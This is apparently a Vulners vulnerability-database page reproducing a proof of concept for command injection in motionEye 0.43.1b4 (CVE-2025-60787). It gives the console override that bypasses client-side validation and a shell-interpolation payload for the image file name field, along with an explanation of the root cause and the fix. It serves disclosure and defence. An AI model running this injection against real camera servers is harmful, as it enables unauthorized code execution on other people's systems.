Lucene search
K

๐Ÿ“„ motionEye 0.43.1b4 Remote Code Execution

๐Ÿ—“๏ธย 11 Feb 2026ย 00:00:00Reported byย prabhatverma47Typeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 148ย Views

motionEye 0.43.1b4 RCE via client-side validation bypass; UI override allows shell commands.

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for OS Command Injection in Motioneye_Project Motioneye
28 Feb 202620:59
โ€“githubexploit
GithubExploit
Exploit for OS Command Injection in Motioneye_Project Motioneye
7 Mar 202608:45
โ€“githubexploit
GithubExploit
ofensive-playbook
16 Apr 202616:40
โ€“githubexploit
GithubExploit
Exploit for OS Command Injection in Motioneye_Project Motioneye
8 Mar 202601:47
โ€“githubexploit
GithubExploit
Exploit for OS Command Injection in Motioneye_Project Motioneye
8 Mar 202604:01
โ€“githubexploit
GithubExploit
Exploit for CVE-2025-60787
3 Oct 202515:20
โ€“githubexploit
GithubExploit
Exploit for OS Command Injection in Motioneye_Project Motioneye
14 Mar 202611:16
โ€“githubexploit
GithubExploit
Exploit for Improper Input Validation in Motioneye_Project Motioneye
10 Jul 202617:40
โ€“githubexploit
GithubExploit
ffensive-playbook
16 Apr 202616:40
โ€“githubexploit
Circl
CVE-2025-60787
3 Oct 202515:26
โ€“circl
Rows per page
# Exploit Title: motionEye 0.43.1b4 - RCE 
    # Exploit PoC: motionEye RCE via client-side validation bypass (safe PoC)
    # Filename: motioneye_rce_poc_edb.txt
    # Author: prabhatverma47
    # Date tested: 2025-05-14 (original test); prepared for submission: 2025-10-11
    # Affected Versions: motionEye <= 0.43.1b4
    # Tested on: Debian host running Docker; motionEye image ghcr.io/motioneye-project/motioneye:edge
    # CVE(s) / References: MITRE/OSV advisories referenced: CVE-2025-60787 
    #
    # Short description:
    # Client-side validation in motionEye's web UI can be bypassed via overriding the JS validation
    # function. Arbitrary values (including shell interpolation syntax) can be saved into the
    # motion config. When motion is restarted, the motion process interprets the config and
    # can execute shell syntax embedded inside configuration values such as "image_file_name".
    #
    # Safe PoC: creates a harmless file /tmp/test inside container (non-destructive).
    #
    # Environment setup:
    # 1) Start the motionEye docker image:
    #    docker run -d --name motioneye -p 9999:8765 ghcr.io/motioneye-project/motioneye:edge
    #
    # 2) Verify version in logs:
    #    docker logs motioneye | grep "motionEye server"
    #    Expect: 0.43.1b4 (or <= 0.43.1b4 for vulnerable)
    #
    # 3) Access web UI:
    #    Open http://127.0.0.1:9999
    #    Login: admin (blank password in default/edge image)
    #
    # Reproduction (manual + safe PoC):
    # A) Bypass client-side validation in browser console:
    #    1) Open browser devtools on the dashboard (F12 / Ctrl+Shift+I).
    #    2) In the Console tab paste and run:
    #
    #       configUiValid = function() { return true; };
    #
    #    This forces the UI validation function to always return true and allows any value
    #    to be accepted by the UI forms.
    #
    # B) Safe payload (paste this into Settings โ†’ Still Images โ†’ Image File Name and Apply):
    #    $(touch /tmp/test).%Y-%m-%d-%H-%M-%S
    #
    #    After applying, the PoC triggers creation of /tmp/test inside the motionEye container
    #    (the "touch" is executed when motion re-reads the config / motionctl restarts).
    #
    # C) Verify from host:
    #    docker exec -it motioneye ls -la /tmp | grep test
    #
    # Expected result:
    #    /tmp/test exists (created with the permissions of the motion process).
    #
    # Notes / root cause:
    # - UI stores un-sanitized values into camera-*.conf (e.g., picture_filename),
    #   which are later parsed by motion and interpreted as filenames โ€“ shell meta is executed.
    # - Fix: sanitize/whitelist filename characters (example sanitization provided in README).
    #
    # References:
    # - Original PoC & writeup: https://github.com/prabhatverma47/motionEye-RCE-through-config-parameter
    # - motionEye upstream: https://github.com/motioneye-project/motioneye
    # - OSV/GHSA advisories referencing this issue (published Mayโ€“Oct 2025)
    # - NVD entries: CVE-2025-60787

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.17.2
EPSS0.18993
SSVC
148